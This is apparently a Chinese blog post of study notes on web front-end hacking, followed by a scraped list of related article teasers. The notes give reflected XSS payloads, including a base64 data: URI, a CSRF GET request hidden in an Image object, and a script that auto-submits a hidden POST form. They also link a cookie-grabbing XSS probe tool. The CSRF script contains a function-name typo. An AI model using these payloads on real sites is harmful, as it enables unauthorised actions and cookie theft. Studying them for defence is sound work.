wcc526

Web前端黑客技术揭秘笔记3

一.CSS容错性

<link rel="stylesheet" href="test.html">
<h1>xxxx</h1>

h1{
    font-size:50px;
    color:red;
    </style>
    <div>xxx</div>
    }h2{color:green;}

<title>1</title>
...
<div>...</div>
{}h1{font-size:50x;}

如果h1之前有大量非法的字符串,加上{}即可,IE加上}即可

二.XSS类型

2.1反射型xss

如reflect1.php

<?php
 echo $_GET['x'];
?>

可以提交

http://www.foo.com/xss/reflect1.php?x=<script>alert(1)</script>

如reflect2.php

<?php
    header('Location: '.$_GET['x']);
?>

x的值作为响应头部的Location字段值输出,意味着会发生跳转,触发XSS的其中一种方式如下

http://www.foo.com/book/reflect2.php?x=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ%2b

2.2 存储型XSS

提交的XSS代码会存储在服务器端,如留言板XSS

2.3 DOM XSS

不需要服务器解析响应的直接参与

http://www.webappsec.org/projects/articles/071105.shtml

三.CSRF

3.1可以跨域发出GET请求,但是不可以得到其响应内容

关键点:请求是身份验证后的

<script>
new Image().src='http://www.a.com/blog/del?id=1'
</script>

3.2 发送POST请求

<body> </body>
<script>
function new_form(){
    var f=document.createElement("form");
    document.body.appendChild(f);
    f.method="post";
    return f;
}
function create_elements(eForm,eName,eValue){
    //创建表单项函数,eForm表单对象,eName表单项,eValue表单项值
    var e=document.createElement("input");
    eForm.appendChild(e);
    e.type='text';
    e.name=eName;
    if(!document.all){
        e.style.display='none';
    }
    else{
        e.style.display='block';
        e.style.width='0px';
        e.style.height='0px';
    }
    e.value=eValue;
    return e;
}
var _f=new _form();
create_elements(_f,"title","hi");
create_elements(_f,"content","csrf_here");
_f.action="http://www.a.com/blog/add";
_f.submit();
</script>

3.3 xssprobe

https://github.com/evilcos/xssprobe

可以获取Cookie,flash版本信息

你可能感兴趣的:(黑客)

一篇文章带你理解黑客、骇客、白客、红客的区别和作用编程小亦黑客 PHP php web安全安全
遵循AI写法主编：hurrycry黑客（Hacker）黑客一词最早可以追溯到20世纪60年代的麻省理工学院（MIT）。当时，一群才华横溢的计算机爱好者，他们热衷于探索计算机系统的奥秘。这些人被称为黑客，他们最初的目的是为了更好地理解计算机的工作原理，通过编写程序来解决复杂的技术问题。他们以自己的技术能力为傲，并且有着强烈的好奇心和求知欲。例如，早期的黑客会尝试优化计算机的操作系统，或者找到新的方法
2025年网络安全（黑客技术）三个月自学手册 csbDD web安全安全网络 python linux 网络安全密码学
基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习
2024年网络安全（黑客技术）三个月自学手册 csbDD web安全安全网络
基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习
2024年网络安全（黑客技术）三个月自学手册 csbDD web安全安全网络
基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习
深入了解 AppScan 工具的使用：筑牢 Web 应用安全防线垚垚 Securify 前沿站十大漏洞网络安全前端 web安全系统安全运维
前言IBMAppScan作为一款业界领先的Web应用程序安全测试工具，就像一位专业的“安全卫士”，能够精准高效地识别并协助修复各类安全漏洞，为应用安全保驾护航。接下来，让我们一同深入探索AppScan的使用奥秘。一、探秘AppScan：功能与原理剖析AppScan的核心功能是模拟黑客的多样化攻击手段，对Web应用程序展开全方位、无死角的深度扫描，从而揪出隐藏其中的SQL注入、跨站脚本（XSS）、文
网络安全：挑战、技术与未来发展一ge科研小菜鸡运维网络运维
个人主页：一ge科研小菜鸡-CSDN博客期待您的关注1.引言在数字化时代，网络安全（Cybersecurity）已成为全球关注的焦点。随着云计算、大数据、人工智能（AI）、物联网（IoT）等技术的发展，企业和个人的敏感数据在互联网上的流通日益增加，黑客攻击、数据泄露、勒索软件等网络安全威胁也日趋严峻。本文将从网络安全的核心概念、常见攻击手段、防御技术、企业安全策略以及未来发展趋势等方面，深入探讨如
2024山东省职业院校技能大赛“网络空间安全”赛题及赛题解析（超详细）_2024年山东省职业院校技能大赛中职组网络安全赛项竞赛样题(2) 2401_84252820 程序员安全 web安全
如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识（2天）①了解行业相关背景，前景，确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。（非常重要）2、渗透测试基础（一周）①渗透测试的流程、分类、标准②信息收集技术：主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF
网络IP地址冲突故障，快速解决方案（非常详细）零基础入门到精通，收藏这一篇就够了_内网总提示有ip冲突(1) 2401_84263282 网络 tcp/ip 网络协议
还有兄弟不知道网络安全面试可以提前刷题吗？费时一周整理的160+网络安全面试题，金九银十，做网络安全面试里的显眼包！王岚嵚工程师面试题（附答案），只能帮兄弟们到这儿了！如果你能答对70%，找一个安全工作，问题不大。对于有1-3年工作经验，想要跳槽的朋友来说，也是很好的温习资料！【完整版领取方式在文末！！】93道网络安全面试题内容实在太多，不一一截图了黑客学习资源推荐最后给大家分享一份全套的网络安全
七个合法学习黑客技术的平台，让你从萌新成为大佬黑客白帽子黑爷学习 php 开发语言 web安全网络
href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/kdoc_html_views-1a98987dfd.css"rel="stylesheet"/>href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_v
30岁了，零基础想转行网安从头开始现实吗？白帽黑客勇哥人工智能网络 web安全网络安全 python
为什么30岁转行网安是现实的？1.网络安全需求不断增长网络安全这一行业在过去几年中增长非常迅速，原因是互联网发展带来了巨大的数据和信息泄露风险。几乎所有的行业，尤其是金融、电商、医疗、政府等领域，都在面临严峻的网络安全挑战。无论是大公司还是中小企业，都急需网络安全专家来防范黑客攻击、数据泄露以及其他各种网络威胁。这样的背景使得网络安全领域一直是个朝阳行业，需求巨大，人才紧缺。2.年龄不是问题在许多
如何了解您的手机是否已经被黑客攻击黑客Ash 网络安全 web安全 php
当您遇到诸如数据使用流量超过正常水平、出现未下载安装的新应用、不寻常或不正当的弹出窗口等警告迹象时，您可以知道您的手机是否已经被黑客攻击。继续阅读，了解表明您的手机已被黑客攻击或正在被攻击的警告迹象，以及如果您发现手机被黑客攻击时您可以采取的措施。1.异常的或不正当的弹出窗口一个手机被黑客攻击的迹象是，您在使用手机时注意到有弹出窗口。有些弹出窗口甚至有不正当的内容。手机上出现的无理由的弹出窗口是手
2025年——【寒假】自学黑客计划（网络安全）网安CILLE web安全网络安全网络安全 linux
CSDN大礼包：基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客
企业文件安全：防范内部人员数据泄露风险够快云库企业数据安全企业文件安全
在企业文件安全管理中，外部黑客攻击常常受到广泛关注，然而，内部人员造成的数据泄露风险同样不容忽视。内部人员可能因疏忽、不满或被利益诱惑等原因，导致企业敏感文件数据泄露，给企业带来巨大损失。一、内部人员数据泄露的现状与原因当前，企业内部人员数据泄露事件时有发生。一方面，部分员工安全意识淡薄，随意将文件存储在不安全的设备上，或通过不加密的渠道传输文件，增加了数据泄露的风险。另一方面，一些员工因对企业的
网络安全从零开始学习CTF——CTF基本概念 Hacker_Oldv web安全学习安全
这一系列把自己学习的CTF的过程详细写出来，方便大家学习时可以参考。一、CTF简介01」简介中文一般译作夺旗赛（对大部分新手也可以叫签到赛），在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。CTF起源于1996年DEFCON全球黑客大会，以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。02」竞赛模式解题模式：在解题模式CTF赛制中，参赛队伍可以通过互联网或者现场网络参
网络安全（黑客）——自学2024 白帽子黑客-宝哥 web安全安全嵌入式硬件网络单片机
一、什么是网络安全网络安全是一种综合性的概念，涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、网络安全怎么入门安全并非孤立存在，而是建立在其计算机基础之上的应用技术。
网络安全（黑客）——自学2025 网安大师兄 web安全安全网络网络安全 linux
基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习
自学网络安全（黑客技术）2024年 —100天学习计划帝王挥剑指天下 C++web安全学习网络
基于入门网络安全/黑客打造的：前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习导航三大章节，涉及价值观、方法论、
自学网络安全（黑客技术）2024年 —100天学习计划白帽黑客cst 学习网络安全 web安全 linux
基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习
第六篇：数字逻辑的“矩阵革命”——域控制器中的组合电路设计天天爱吃肉8218 学习笔记矩阵线性代数汽车笔记
副标题：用卡诺图破解车身域控制器的逻辑迷宫，揭秘华为DriveONE的“数字特工”▍开篇：黑客帝国世界观映射>"WelcometotheRealWorld."——Morpheus>在数字逻辑的世界里，组合电路就是构建Matrix的底层代码。当新能源汽车的域控制器需要同时处理车门锁、灯光控制、热管理信号时，就像Neo同时躲避多个特工的追击——只有最优化的逻辑设计，才能让系统在纳秒级响应中游刃有余。核
自学黑客（网络安全），一般人我劝你还是算了吧网安周星星 web安全安全 windows 网络网络安全
基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包文章讲述了自学网络安全时常见的误区，如先学编程、过度追求深度学习以及收集过多资料，并提供了前期学习的硬件、软件选择建议，强调了基础编程知识和英文能力的重要性。文中给出了详细的学习路线，包括基础操作入门、实战操作以及参加CTF和HVV等竞赛来提升技能，并推荐了一系列相关书籍和学习资源。一、自学网络安全学习的误区和陷阱1.不要试图先成为一
人生建议往死里学网络安全！零基础也能跨行学习！！漏洞挖掘还能做副业～小羊没烦恼～ web安全学习网络服务器安全
一、网络安全的重要性：从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题，它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全，到国家的信息防护，网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露，还是国家间的信息战，网络安全已经成为现代社会的基础设施之一。所以，首先要明白学习网络安全的重要性：你不仅是在学习技术，更多的是在为自己和他人的安全“筑城
30岁了，零基础想转行网安从头开始现实吗？白帽黑客勇哥网络安全 web安全转行 linux 系统安全
为什么30岁转行网安是现实的？1.网络安全需求不断增长网络安全这一行业在过去几年中增长非常迅速，原因是互联网发展带来了巨大的数据和信息泄露风险。几乎所有的行业，尤其是金融、电商、医疗、政府等领域，都在面临严峻的网络安全挑战。无论是大公司还是中小企业，都急需网络安全专家来防范黑客攻击、数据泄露以及其他各种网络威胁。这样的背景使得网络安全领域一直是个朝阳行业，需求巨大，人才紧缺。2.年龄不是问题在许多
第十篇：电源设计的“能量矩阵”——无线充电与碳化硅LLC谐振天天爱吃肉8218 学习笔记矩阵汽车笔记
副标题：用SiC器件重构《黑客帝国》的能源母体，打造11kW无线充电的“代码圣殿”▶隐喻框架——能量矩阵的数字化生存-核心设定：-能量母体=整车电源系统（OBC/DCDC/无线充电）-史密斯病毒=电磁干扰（EMI）与开关损耗-EMP武器=SiC器件的高频低损特性-场景映射：>"当尼奥在EMP冲击下瘫痪哨兵机器人时，碳化硅MOSFET正在用高频开关击溃传统硅基器件的损耗困局。"---▶技术纵深——从
浏览器安全学习 Shanfenglan7 安全学习
浏览器特性会将一些特殊符号当做字母进行解析，此时一个符号可能会被解析成两个到三个字母，这样子如果有漏洞对输入做了限制，黑客就可以利用这个特性来绕过某些漏洞中长度限制。某些特殊字符或者其他国家的文字和某些字母的形状一模一样，也有可能会被黑客用来伪造域名。不过现在已经不支持其他国家的文字和英文在一起来注册域名了。浏览器的输入框可以直接输入账号密码登录服务器，此时可以构造特殊的账号密码，来迷惑用户让其以
Web应用安全威胁与防护措施星环之光网络安全网络 web安全
本文已收录至《全国计算机等级考试——信息安全技术》专栏由于极其容易出现漏洞、并引发安全事故，因此数据隐私的保护是目前绝大多数企业不可绕过的运维环节。不过，许多中小型企业往往会错误地认为只有大型企业才会成为黑客的目标。而实际统计数字却截然不同：有43%的网络犯罪恰恰是针对小型企业的。而且，无论是系统陈旧且未给漏洞打上安全补丁，还是各种恶意软件，甚至是一些人为的错误，都可以成为系统的受攻击面。如果仔细
2025年——【寒假】自学黑客计划（网络安全）网安CILLE web安全网络安全网络安全 linux
CSDN大礼包：基于入门网络安全/黑客打造的：黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客
人生建议往死里学网络安全！零基础也能跨行学习！！漏洞挖掘还能做副业黑客老哥学习 web安全安全网络黑客
一、网络安全的重要性：从‘不学会被黑’到‘学会保护别人’网络安全的概念现在不再是技术圈的独立话题，它已经渗透到社会的各个领域。从个人的隐私保护、企业的数据安全，到国家的信息防护，网络安全几乎影响了每一个人的生活。无论是黑客攻击、勒索病毒、数据泄露，还是国家间的信息战，网络安全已经成为现代社会的基础设施之一。所以，首先要明白学习网络安全的重要性：你不仅是在学习技术，更多的是在为自己和他人的安全“筑城
网络安全最新网络安全——网络层安全协议（2）(1)，2024年春招网络安全面试题咕咕爱说耳机网络安全学习面试
如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识（2天）①了解行业相关背景，前景，确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。（非常重要）2、渗透测试基础（一周）①渗透测试的流程、分类、标准②信息收集技术：主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF
WAF实现扫描器识别 weixin_34001430 人工智能 php 操作系统
目前安全测试的软件越来越多，也越来越强大，越来越多的人成为[黑客]，今天在网上看到一个文章说拦截wvs的扫描，勾起了我写这篇文章的欲望。因为公司的三大业务之一就有一个云waf，每天拦截的日志里面，有将近90%的请求是扫描器发出，waf接收到请求会解析数据包，然后过一遍规则，过完成百上千条规则必定对性能有一定的影响。如果能识别出来是人还是扫描器的请求，就可以在这方面节省很大的资源。下面的分析介绍只针
挖洞经验 | 构造基于时间的盲注漏洞（Time-Based SQLi）是叶十三信息安全信息安全网络安全渗透测试 kali
公粽号：黒掌一个专注于分享网络安全、黑客圈热点、黑客工具技术区博主！****某天，当我参与某个漏洞众测项目中，偶尔发现之前一个从未见过的子域名网站，因此我决定深入测试一下。该网站主界面是一个登录页面，开放了用户注册功能，所以我就注册了一个账户，最后试出了一个时间盲注来。在查看该网站过程中，我发现其中还有一个搜索功能，我尝试进行了XSS，但是无效。当时，我根本没想着去测试SQL注入漏洞，因为我觉得开
对于规范和实现，你会混淆吗？ yangshangchuan HotSpot
昨晚和朋友聊天，喝了点咖啡，由于我经常喝茶，很长时间没喝咖啡了，所以失眠了，于是起床读JVM规范，读完后在朋友圈发了一条信息： JVM Run-Time Data Areas：The Java Virtual Machine defines various run-time data areas that are used during execution of a program. So
android 网络百合不是茶网络
android的网络编程和java的一样没什么好分析的都是一些死的照着写就可以了,所以记录下来方便查找 , 服务器使用的是TomCat 服务器代码; servlet的使用需要在xml中注册 package servlet; import java.io.IOException; import java.util.Arr
[读书笔记]读法拉第传 comsci 读书笔记
1831年的时候,一年可以赚到1000英镑的人..应该很少的... 要成为一个科学家,没有足够的资金支持,很多实验都无法完成但是当钱赚够了以后....就不能够一直在商业和市场中徘徊......
随机数的产生沐刃青蛟随机数
c++中阐述随机数的方法有两种：一是产生假随机数（不管操作多少次，所产生的数都不会改变）这类随机数是使用了默认的种子值产生的，所以每次都是一样的。 //默认种子 for (int i = 0; i < 5; i++) { cout<<
PHP检测函数所在的文件名 IT独行者 PHP 函数
很简单的功能，用到PHP中的反射机制，具体使用的是ReflectionFunction类，可以获取指定函数所在PHP脚本中的具体位置。创建引用脚本。代码： [php] view plain copy // Filename: functions.php <?php&nbs
银行各系统功能简介文强chu 金融
银行各系统功能简介　业务系统核心业务系统业务功能包括：总账管理、卡系统管理、客户信息管理、额度控管、存款、贷款、资金业务、国际结算、支付结算、对外接口等清分清算系统以清算日期为准，将账务类交易、非账务类交易的手续费、代理费、网络服务费等相关费用，按费用类型计算应收、应付金额，经过清算人员确认后上送核心系统完成结算的过程国际结算系
Python学习1(pip django 安装以及第一个project) 小桔子 python django pip
最近开始学习python,要安装个pip的工具。听说这个工具很强大，安装了它，在安装第三方工具的话so easy!然后也下载了，按照别人给的教程开始安装，奶奶的怎么也安装不上！第一步：官方下载pip-1.5.6.tar.gz, https://pypi.python.org/pypi/pip easy! 第二部：解压这个压缩文件，会看到一个setup.p
php 数组 aichenglong PHP 排序数组循环多维数组
1 php中的创建数组 $product = array('tires','oil','spark');//array()实际上是语言结构而不是函数 2 如果需要创建一个升序的排列的数字保存在一个数组中，可以使用range()函数来自动创建数组 $numbers=range(1,10)//1 2 3 4 5 6 7 8 9 10 $numbers=range(1,10,
安装python2.7 AILIKES python
安装python2.7 1、下载可从 http://www.python.org/进行下载#wget https://www.python.org/ftp/python/2.7.10/Python-2.7.10.tgz 2、复制解压 #mkdir -p /opt/usr/python #cp /opt/soft/Python-2
java异常的处理探讨百合不是茶 JAVA异常
//java异常 /* 1，了解java 中的异常处理机制，有三种操作 a,声明异常 b,抛出异常 c,捕获异常 2，学会使用try-catch-finally来处理异常 3，学会如何声明异常和抛出异常 4，学会创建自己的异常 */ //2，学会使用try-catch-finally来处理异常
getElementsByName实例 bijian1013 element
实例1： <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/x
探索JUnit4扩展：Runner bijian1013 java 单元测试 JUnit
参加敏捷培训时，教练提到Junit4的Runner和Rule，于是特上网查一下，发现很多都讲的太理论，或者是举的例子实在是太牵强。多搜索了几下，搜索到两篇我觉得写的非常好的文章。文章地址：http://www.blogjava.net/jiangshachina/archive/20
[MongoDB学习笔记二]MongoDB副本集 bit1129 mongodb
1. 副本集的特性 1)一台主服务器(Primary),多台从服务器(Secondary) 2)Primary挂了之后，从服务器自动完成从它们之中选举一台服务器作为主服务器，继续工作，这就解决了单点故障，因此，在这种情况下，MongoDB集群能够继续工作 3)挂了的主服务器恢复到集群中只能以Secondary服务器的角色加入进来 2
【Spark八十一】Hive in the spark assembly bit1129 assembly
Spark SQL supports most commonly used features of HiveQL. However, different HiveQL statements are executed in different manners: 1. DDL statements (e.g. CREATE TABLE, DROP TABLE, etc.)
Nginx问题定位之监控进程异常退出 ronin47
nginx在运行过程中是否稳定，是否有异常退出过？这里总结几项平时会用到的小技巧。 1. 在error.log中查看是否有signal项，如果有，看看signal是多少。比如，这是一个异常退出的情况： $grep signal error.log 2012/12/24 16:39:56 [alert] 13661#0: worker process 13666 exited on s
No grammar constraints (DTD or XML schema).....两种解决方法 byalias xml
方法一：常用方法关闭XML验证工具栏：windows => preferences => xml => xml files => validation => Indicate when no grammar is specified:选择Ignore即可。方法二：（个人推荐）添加内容如下 <?xml version=
Netty源码学习-DefaultChannelPipeline bylijinnan netty
package com.ljn.channel; /** * ChannelPipeline采用的是Intercepting Filter 模式 * 但由于用到两个双向链表和内部类，这个模式看起来不是那么明显，需要仔细查看调用过程才发现 * * 下面对ChannelPipeline作一个模拟，只模拟关键代码： */ public class Pipeline {
MYSQL数据库常用备份及恢复语句 chicony mysql
备份MySQL数据库的命令，可以加选不同的参数选项来实现不同格式的要求。 mysqldump -h主机 -u用户名 -p密码数据库名 > 文件备份MySQL数据库为带删除表的格式，能够让该备份覆盖已有数据库而不需要手动删除原有数据库。 mysqldump -–add-drop-table -uusername -ppassword databasename > ba
小白谈谈云计算--基于Google三大论文 CrazyMizzz Google 云计算 GFS
之前在没有接触到云计算之前，只是对云计算有一点点模糊的概念，觉得这是一个很高大上的东西，似乎离我们大一的还很远。后来有机会上了一节云计算的普及课程吧，并且在之前的一周里拜读了谷歌三大论文。不敢说理解，至少囫囵吞枣啃下了一大堆看不明白的理论。现在就简单聊聊我对于云计算的了解。我先说说GFS &n
hadoop 平衡空间设置方法 daizj hadoop balancer
在hdfs-site.xml中增加设置balance的带宽，默认只有1M： <property> <name>dfs.balance.bandwidthPerSec</name> <value>10485760</value> <description&g
Eclipse程序员要掌握的常用快捷键 dcj3sjt126com 编程
判断一个人的编程水平，就看他用键盘多，还是鼠标多。用键盘一是为了输入代码（当然了，也包括注释），再有就是熟练使用快捷键。曾有人在豆瓣评《卓有成效的程序员》：“人有多大懒，才有多大闲”。之前我整理了一个程序员图书列表，目的也就是通过读书，让程序员变懒。程序员作为特殊的群体，有的人可以这么懒，懒到事情都交给机器去做，而有的人又可以那么勤奋，每天都孜孜不倦得
Android学习之路 dcj3sjt126com Android学习
转自：http://blog.csdn.net/ryantang03/article/details/6901459 以前有J2EE基础，接触JAVA也有两三年的时间了，上手Android并不困难，思维上稍微转变一下就可以很快适应。以前做的都是WEB项目，现今体验移动终端项目，让我越来越觉得移动互联网应用是未来的主宰。下面说说我学习Android的感受，我学Android首先是看MARS的视
java 遍历Map的四种方法 eksliang java HashMap java 遍历Map的四种方法
转载请出自出处： http://eksliang.iteye.com/blog/2059996 package com.ickes; import java.util.HashMap; import java.util.Iterator; import java.util.Map; import java.util.Map.Entry; /** * 遍历Map的四种方式
【精典】数据库相关相关 gengzg 数据库
package C3P0; import java.sql.Connection; import java.sql.SQLException; import java.beans.PropertyVetoException; import com.mchange.v2.c3p0.ComboPooledDataSource; public class DBPool{
自动补全 huyana_town 自动补全
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml&quo
jquery在线预览PDF文件，打开PDF文件天梯梦 jquery
最主要的是使用到了一个jquery的插件jquery.media.js，使用这个插件就很容易实现了。核心代码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.
ViewPager刷新单个页面的方法 lovelease android viewpager tag 刷新
使用ViewPager做滑动切换图片的效果时，如果图片是从网络下载的，那么再子线程中下载完图片时我们会使用handler通知UI线程，然后UI线程就可以调用mViewPager.getAdapter().notifyDataSetChanged()进行页面的刷新，但是viewpager不同于listview，你会发现单纯的调用notifyDataSetChanged()并不能刷新页面
利用按位取反（~）从复合枚举值里清除枚举值草料场 enum
以 C# 中的 System.Drawing.FontStyle 为例。如果需要同时有多种效果，如：“粗体”和“下划线”的效果，可以用按位或（|） FontStyle style = FontStyle.Bold | FontStyle.Underline; 如果需要去除 style 里的某一种效果，
Linux系统新手学习的11点建议刘星宇编程工作 linux 脚本
　　随着Linux应用的扩展许多朋友开始接触Linux，根据学习Windwos的经验往往有一些茫然的感觉：不知从何处开始学起。这里介绍学习Linux的一些建议。　　一、从基础开始：常常有些朋友在Linux论坛问一些问题，不过，其中大多数的问题都是很基础的。例如：为什么我使用一个命令的时候，系统告诉我找不到该目录，我要如何限制使用者的权限等问题，这些问题其实都不是很难的，只要了解了 Linu
hibernate dao层应用之HibernateDaoSupport二次封装 wangzhezichuan DAO Hibernate
/** * <p>方法描述:sql语句查询返回List<Class> </p> * <p>方法备注: Class 只能是自定义类 </p> * @param calzz * @param sql * @return * <p>创建人：王川</p> * <p>创建时间：Jul

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他